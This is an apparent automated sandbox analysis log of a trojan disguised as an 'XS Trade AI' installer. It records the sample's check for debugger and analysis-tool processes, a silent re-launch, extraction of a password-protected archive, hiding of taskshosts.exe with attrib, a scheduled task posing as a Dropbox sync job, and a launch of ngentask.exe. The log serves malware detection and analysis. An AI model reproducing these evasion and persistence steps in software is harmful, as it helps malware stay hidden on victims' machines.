      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040B26021_2_0040B260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040A27021_2_0040A270
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0043E23021_2_0043E230
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004432C021_2_004432C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004012D521_2_004012D5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041E29821_2_0041E298
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040132821_2_00401328
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042C3E021_2_0042C3E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044238021_2_00442380
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004433B021_2_004433B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042F4DD21_2_0042F4DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042949421_2_00429494
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004094BF21_2_004094BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041F51021_2_0041F510
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004255A421_2_004255A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004335B021_2_004335B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042D64221_2_0042D642
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042762D21_2_0042762D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004386FE21_2_004386FE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004226A021_2_004226A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042762D21_2_0042762D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040D76021_2_0040D760
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044172021_2_00441720
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044372021_2_00443720
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040A73021_2_0040A730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042949421_2_00429494
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042B7D921_2_0042B7D9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042B7FE21_2_0042B7FE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044285021_2_00442850
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041482A21_2_0041482A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004038E021_2_004038E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0043994021_2_00439940
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040796021_2_00407960
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044492021_2_00444920
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0043198021_2_00431980
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042AA4021_2_0042AA40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042CA7221_2_0042CA72
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00420A2421_2_00420A24
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00421B4021_2_00421B40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040DB2021_2_0040DB20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00415BD821_2_00415BD8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00439BA021_2_00439BA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00414BBF21_2_00414BBF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00444C5021_2_00444C50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00434C6021_2_00434C60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042AC0421_2_0042AC04
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0043EC2021_2_0043EC20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040ECC021_2_0040ECC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00427CD221_2_00427CD2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041ECDE21_2_0041ECDE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040BD7021_2_0040BD70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00429D0021_2_00429D00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040ADD021_2_0040ADD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00432D8021_2_00432D80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00408DA021_2_00408DA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00422E5021_2_00422E50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00416E1021_2_00416E10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042BE1021_2_0042BE10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00442EB021_2_00442EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00406F6021_2_00406F60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00428F0021_2_00428F00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00408DA021_2_00408DA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00426F8221_2_00426F82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00434F8021_2_00434F80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00441F8021_2_00441F80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00409F9C21_2_00409F9C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00404FA021_2_00404FA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00409FA821_2_00409FA8
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeProcess token adjusted: SecurityJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: String function: 00682340 appears 86 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: String function: 00682290 appears 194 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: String function: 00689710 appears 44 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: String function: 006987DB appears 58 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: String function: 0068A140 appears 100 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: String function: 0041C2A0 appears 176 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: String function: 0040C8C0 appears 71 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: String function: 00271DFC appears 37 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: String function: 00271E30 appears 88 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: String function: 003150F0 appears 741 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: String function: 00272A44 appears 47 times
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: invalid certificate
      Source: XS_Trade_AI-newest_release_.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: XS_Trade_AI-newest_release_.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: XS_Trade_AI-newest_release_.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: XS_Trade_AI-newest_release_.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785573250.000000007F9B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000000.1782909326.00000000004B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1844353581.0000000002338000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785088094.0000000002510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000002.00000003.1924488149.0000000002218000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exeBinary or memory string: OriginalFileName vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: DontSleep_x64.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.9952699829931972
      Source: DontSleep_x64.exe.3.drStatic PE information: Section: .data ZLIB complexity 0.9952699829931972
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@31/56@4/4
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006865B0 GetLastError,FormatMessageW,15_2_006865B0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0028458B __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_0028458B
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00279749 _fileno,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_00279749
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002796A5 DeviceIoControl,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,6_2_002796A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00432088 CoCreateInstance,21_2_00432088
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeFile created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmpJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="processhacker.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="systeminformer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="procmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="tcpview.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="idaq64.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="filemon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="joeboxserver.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="cain.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="wsbroker.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="x32dbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="shade.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="xenservice.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="lordpe.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="proc_analyzer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="bitbox.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="autoruns.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="regmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="ollydbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="x64dbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="hookexplorer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="dumpcap.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="fiddler.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="windbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="procexp.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="idaq.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="httpanalyzerstdv7.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="wireshark.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="netstat.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="docker.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="httpdebuggerui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="firejail.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="comodosandbox.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="sysanalyzer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="cuckoo.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="immunitydebugger.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="joeboxcontrol.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="appguarddesktop.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="petools.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="autorunsc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="sysinspector.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="netmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="sniff_hit.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
      Source: XS_Trade_AI-newest_release_.exeString found in binary or memory: /LOADINF="filename"
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeFile read: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp "C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$402A0,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip" -o"C:\Users\user\AppData\Local\Programs\Common" -y -p55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\.cmd""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe
